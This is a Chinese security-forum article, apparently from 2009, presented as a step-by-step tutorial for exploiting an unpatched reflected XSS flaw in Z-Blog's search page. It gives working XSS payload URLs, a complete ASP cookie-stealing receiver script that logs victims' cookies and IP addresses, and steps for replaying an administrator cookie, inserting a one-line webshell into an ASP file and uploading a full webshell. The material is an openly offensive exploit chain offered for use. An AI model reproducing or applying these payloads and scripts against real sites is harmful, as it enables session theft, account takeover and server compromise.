首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Zblog所有版本Xss漏洞
来源:www.ghostvan.cn 作者:van 发布时间:2009-09-18  

作者:van
Blog:www.ghostvan.cn
测试环境:Vmware, z-blog1.8
影响版本:通杀
被动式攻击:zblog XSS 最新可用.
为了原创,出血了,看了一下,都几个月了,还没补,官方也有此洞.

 
我们下一个全新版本的zblog
测试xss
 
 
哎,官方还没补!
下面讲利用.
先给出攻击语句
http://www.*****.com/search.asp?q=/**/"><img%20src=javascript:alert("van")%20<"
http://www.*****.com/search.asp?q=/**/"><img%20src=javascript:window.location="http://www.ghostvan.cn"%20<"
有了 XSS能做什么? 这可就多了   能做蠕虫  能挂马  能盗取 cookie 能构造备份语句..
今天讲XSS盗取cookies
代码:
Get.asp
<%
dim getcookie
dim mytime
dim str
getcookie=Request.QueryString
getip=Request.ServerVariables("REMOTE_ADDR")
mytime=now()
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("cookie.txt"),8,True)
str="<-bof||"& mytime & "||" &getip & "||" & getcookie & "||eof->"
file.writeline(str)
file.close
set file=nothing
set fs=nothing
response.write " "
response.end
%>
第一次没偷出来,然后跟叶子(Blog:www.yezishell.cn)商量了一下,
原来是地址出错,哈哈.
第二次

嘿嘿,cookies出来了!
然后找一个能改cookies的浏览器,地址输入后台管理页面
http://localhost/admin/admin_default.asp
然后访问,返回错误,然后将cookies粘贴进去,点击修改
嘿嘿,一个z-Blog就这样拿下了.
进去之后,
随便点开一个asp文件
加一句话,保存.连接
成功,上大马.
教程到此为止!
谢谢!
Van原创,转载请注明出处!


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·QQ的安全威胁
·TRS (文本检索系统)注入
·新的新云0DAY发布 2009年09月20
·nginx HTTP Request Remote Buff
·tomcat和jboss网站%00欺骗
·AspBar V3.0整站管理系统0day
·最新的游戏箱子收信程序上传漏洞
·动网论坛DvBBS boardrule.php模
·深度学习(asp)网址导航0day
·dedecms(plus/feedback_js.php)
·大榕树网络文章管理系统0day
·科讯CMS文件名解析漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved